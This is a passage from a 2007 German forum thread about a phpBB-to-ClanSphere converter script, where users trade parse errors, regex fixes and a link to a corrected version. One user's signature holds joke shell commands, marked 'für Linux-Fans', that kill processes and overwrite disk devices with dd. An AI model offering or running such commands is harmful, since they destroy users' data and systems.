Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 72
Seite < 1 [2] 3 4 >
duRiel ClanSphere Team
Thread-Ersteller


Weltmeister




Herkunft: Cambridge
Beiträge: 7300
# Antwort: 21 - 07.06.2007 um 14:37 Uhr
hier beim reinkopierten fehlen die backslashes :/


Inaktiv
|
Sebel-Design ClanSphere Team


Geekboy





Beiträge: 1160
# Antwort: 22 - 07.06.2007 um 18:23 Uhr
Bräuchte auch einen Converter für IPB 1.3 final (die kostenlose Version).

Meinst du es ist möglich eine bridge dafür zu coden?

Es gibt schon welche aber aus dem Quelltext werde ich überhaupt nicht schlau, wie mann den für CS umsetzen könnte?



------------------
Mit freundlichen Grüßen

SEBEL-DESIGN
http://www.sebel-design.com


Inaktiv
|
duRiel ClanSphere Team
Thread-Ersteller


Weltmeister




Herkunft: Cambridge
Beiträge: 7300
# Antwort: 23 - 07.06.2007 um 19:48 Uhr
ist bestimmt möglich - hab ja auch nur eine einzige sql datei gehabt aus der ich diesen converter geschrieben hab ohne phpbb zu kennen


Inaktiv
|
Sebel-Design ClanSphere Team


Geekboy





Beiträge: 1160
# Antwort: 24 - 07.06.2007 um 23:11 Uhr
Oh wäre super wenn wir das mal zusammen besprechen könnten.

Hab gestern mal geguckt und siehe da IPB Version 1.3 final ist noch for free und von den Funktionen tausend mal besser als PHPBB. Bissl bugig aber das bekomme ich noch hin

Hab ich dich nicht in icq?


------------------
Mit freundlichen Grüßen

SEBEL-DESIGN
http://www.sebel-design.com


Inaktiv
|
holy_moly


Beginner




Beiträge: 10
# Antwort: 25 - 02.07.2007 um 12:02 Uhr
Da ich den Converter für phpBB2 Plus brauche, werde ich ihn etwas erweitern und dann auch gern zur Verfügung stellen.


Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1401
# Antwort: 26 - 02.07.2007 um 12:12 Uhr
Wir können die Converter ja Sammeln und in einer extra Rubrik vielleicht in die Mod-DB mit einbauen *
@fr33z gugg*


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
RayMan


Beginner




Herkunft: Cologne
Beiträge: 12
# Antwort: 27 - 11.07.2007 um 07:35 Uhr
Ich bekomme beim Ausführen folgenden Fehler.

Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /home/www/edafe114/html/server.clan-zorn.de/phpbbconvert.php on line 39


------------------
PH34R MY L33T SK1LLZ
{ZORN}-=RayMan=-
irc.quakenet.org - #zorn

It's my duty to practise
It's my honor to play
It's my reward to win


Inaktiv
|
holy_moly


Beginner




Beiträge: 10
# Antwort: 28 - 13.07.2007 um 00:14 Uhr
Das dürfte an den fehlenden Backslashes liegen.
Ich habe einiges umgestellt am Code und will das als Modul bereitstellen.

Aktuell arbeite ich noch an den Votes des phpBB.

Da ich jetzt zwei Wochen Urlaub habe, wird es wohl noch mindestens so lang dauern, bis ich das hier reinposten kann ;-)


Inaktiv
|
RayMan


Beginner




Herkunft: Cologne
Beiträge: 12
# Antwort: 29 - 13.07.2007 um 04:30 Uhr
Kannst du nicht mal den korrigierten Code hier posten, damit ich weiterkomme, bzw. erklären wo die Backslashes fehlen?


------------------
PH34R MY L33T SK1LLZ
{ZORN}-=RayMan=-
irc.quakenet.org - #zorn

It's my duty to practise
It's my honor to play
It's my reward to win


Inaktiv
|
Sebel-Design ClanSphere Team


Geekboy





Beiträge: 1160
# Antwort: 30 - 13.07.2007 um 09:27 Uhr
Denke mal so an nachfolgende Converter (nur als Idee):

ClanCMS

- Webspell
- Devils Clanportal
- Ilch

Community CMS
- Joomla (Mambo)
- PHPFusion
- PHPNuke

Forenscripte
- vbulletin
- phpbb
- invision board

Eine Bridge zu nachfolgenden Scripten wäre bestimmt auch nicht schlecht:

- Coppermine Gallery, 4images
- PHPBB, vbulletin, invision board

Mehr fällt mir jetzt spontan am morgen nicht ein



------------------
Mit freundlichen Grüßen

SEBEL-DESIGN
http://www.sebel-design.com


Inaktiv
|
theGrimm


Rock the board




Beiträge: 62
# Antwort: 31 - 15.07.2007 um 13:00 Uhr
wbb3 bridge wäre nicht schlecht


------------------

"Die Herrschaft der Dummen ist unüberwindlich, weil es so viele sind, und ihre Stimmen zählen genau wie unsere."



Inaktiv
|
RayMan


Beginner




Herkunft: Cologne
Beiträge: 12
# Antwort: 32 - 16.07.2007 um 20:08 Uhr
Bitte nicht vom Thema abschweifen. Es geht hier um phpBB und ich brauche dringend den funktionierenden Code.


------------------
PH34R MY L33T SK1LLZ
{ZORN}-=RayMan=-
irc.quakenet.org - #zorn

It's my duty to practise
It's my honor to play
It's my reward to win


Inaktiv
|
Weyoun


Wannabe poster



Herkunft: Regensburg
Beiträge: 22
# Antwort: 33 - 17.07.2007 um 08:43 Uhr
20.05.2007 um 13:11 Uhr - SCHIRI:
wir sind alle schon echte clanspherer^^
deshalb haben wir kein phpbb-boarder mehr was wir konvertieren wolle


Hmm... also an phpBB kommt das Forum von Clansphere noch lange nicht ran. Sorry... Ich benutze auf meiner Seite weiterhin das phpBB und verlinke nur darauf von der Seite aus. Denn es bietet Möglichkeiten in Sachen Administration, Benutzerrechte (vor allem das neue phpBB3) u.s.w. die Clansphere wohl in 5 Jahren noch nicht haben wird.


Inaktiv
|
Sebel-Design ClanSphere Team


Geekboy





Beiträge: 1160
# Antwort: 34 - 17.07.2007 um 17:29 Uhr
Naja ist phpbb nur recht pflegebedürftig. Einmal einen fix nicht eingespielt schon gehackt. Ist mit den meisten populären scripten so, das die Hacker es immer darauf abgesehen haben.

Ausserdem finde ich phpbb auch nicht so den bringer. Invision 1.3, simple machine oder wbblite sind die besten kostenlosen foren


------------------
Mit freundlichen Grüßen

SEBEL-DESIGN
http://www.sebel-design.com


Inaktiv
|
nerv


Rock the board



Herkunft: Mannheim
Beiträge: 81
# Antwort: 35 - 25.07.2007 um 14:11 Uhr
hab jetzt mal die Zeit gefunden das Script zu testen.
Als erstes gabs einige parse errors bei mir, habse net gezählt abber glaub musste so 6-8 zeilen abändern.
bsp:
$posts = cs_sql_select(__FILE__,'posts',$postselect,'topic_id = ''.$topic['topic_id'].''',0,0,0);
'' mag er wohl nicht sonderllich mit "'" gehts besser

desweiter gibts ein problem mit 2pregs
Warning: preg_replace() [function.preg-replace]: Unknown modifier '(' in Crogrammexampphtdocsbetaphpbb.php on line 61

Warning: preg_replace() [function.preg-replace]: Unknown modifier '(' in Crogrammexampphtdocsbetaphpbb.php on line 62

Und zu guter letzt funktioniert es nicht bei größeren Foren. Scriptlaufzeit ! würde vorschlagen es schritweiese arbeiten zu lassen und das script sich selber wieder aufrufen lassen.

getestet mit
phpBB Ver. 2.0.19
threads: ~2500
posts: ~30000
user: ~400


------------------
Nur ein Narr kämpft ohne Aussicht auf den Sieg.

Inaktiv
|
RayMan


Beginner




Herkunft: Cologne
Beiträge: 12
# Antwort: 36 - 13.08.2007 um 12:25 Uhr
holy_moly oder wer auch immer ich benötige immer noch das script. Kannst du nicht mal das korrigierte hier posten, damit ich weiterkomme?


------------------
PH34R MY L33T SK1LLZ
{ZORN}-=RayMan=-
irc.quakenet.org - #zorn

It's my duty to practise
It's my honor to play
It's my reward to win


Inaktiv
|
DeNylph


Wannabe poster




Herkunft: Les Sables d'Olonne
Beiträge: 27
# Antwort: 37 - 07.09.2007 um 23:14 Uhr
25.07.07 - 14:11 - nerv:
hab jetzt mal die Zeit gefunden das Script zu testen.
Als erstes gabs einige parse errors bei mir, habse net gezählt abber glaub musste so 6-8 zeilen abändern.
bsp:
$posts = cs_sql_select(__FILE__,'posts',$postselect,'topic_id = ''.$topic['topic_id'].''',0,0,0);
'' mag er wohl nicht sonderllich mit "'" gehts besser

desweiter gibts ein problem mit 2pregs
Warning: preg_replace() [function.preg-replace]: Unknown modifier '(' in Crogrammexampphtdocsbetaphpbb.php on line 61

Warning: preg_replace() [function.preg-replace]: Unknown modifier '(' in Crogrammexampphtdocsbetaphpbb.php on line 62


The script seem to bug change the line by :

$text = preg_replace('#[color=(.*?):(.*?)](.*?)[/color:(.*?)]#si','3',$text);
$text = preg_replace('#[size=(.*?):(.*?)](.*?)[/size:(.*?)]#si','3',$text);

------------------------------------------------------------------------------------------------------------

I try the script but seem to bug again.
The posts are like [qcode] h[/qcode] ....

I modify the function cs_resettext like that :
$text = html_entity_decode($text);
return $text;

The text is ok but appeared like : [quote:8a7d8be9ad=...
That's normal.
But i have another probleme, the users who poste are not count or not exist !!!
And i have some warning during script execution.

/homepages/2/d215717735/htdocs/scriptbb.php: cs_sql_select - Unknown column 'Tybo' in 'where clause'
/homepages/2/d215717735/htdocs/scriptbb.php: cs_sql_select - Unknown column 'bial' in 'where clause'
/homepages/2/d215717735/htdocs/scriptbb.php: cs_sql_select - Unknown column 'Tybo' in 'where clause'
/homepages/2/d215717735/htdocs/scriptbb.php: cs_sql_insert - Duplicate entry 'Tybo' for key 2
/homepages/2/d215717735/htdocs/scriptbb.php: cs_sql_select - Unknown column 'Fox' in 'where clause'
/homepages/2/d215717735/htdocs/scriptbb.php: cs_sql_select - Unknown column 'NoulF' in 'where clause'
.....

If this script creator can modify it to work, it will be helpfull
I tried to modify it alone, but i'm not really good in php and regexp

So please help us ! Thanks



------------------


Inaktiv
|
duRiel ClanSphere Team
Thread-Ersteller


Weltmeister




Herkunft: Cambridge
Beiträge: 7300
# Antwort: 38 - 09.09.2007 um 12:40 Uhr
here it worked well so either youre using any other versions or somehow you dont have the right script because by copying some figures might got lost because of different encodings..

here again a link: http://nopaste.info/5088bf86f2_nl.html


Inaktiv
|
DeNylph


Wannabe poster




Herkunft: Les Sables d'Olonne
Beiträge: 27
# Antwort: 39 - 09.09.2007 um 13:31 Uhr
Thanks !!! Your script work very well

Big thanks again


------------------


Inaktiv
|
Tybo


Wannabe poster





Beiträge: 21
# Antwort: 40 - 09.09.2007 um 13:35 Uhr
Thanks for sharing this file.

We had problems copy-pasting the code in the previous page but it's fine now!


------------------


Inaktiv
|

Dieses Thema wurde von SlayR ClanSphere Team PM geschlossen.

Antworten: 72
Seite < 1 [2] 3 4 >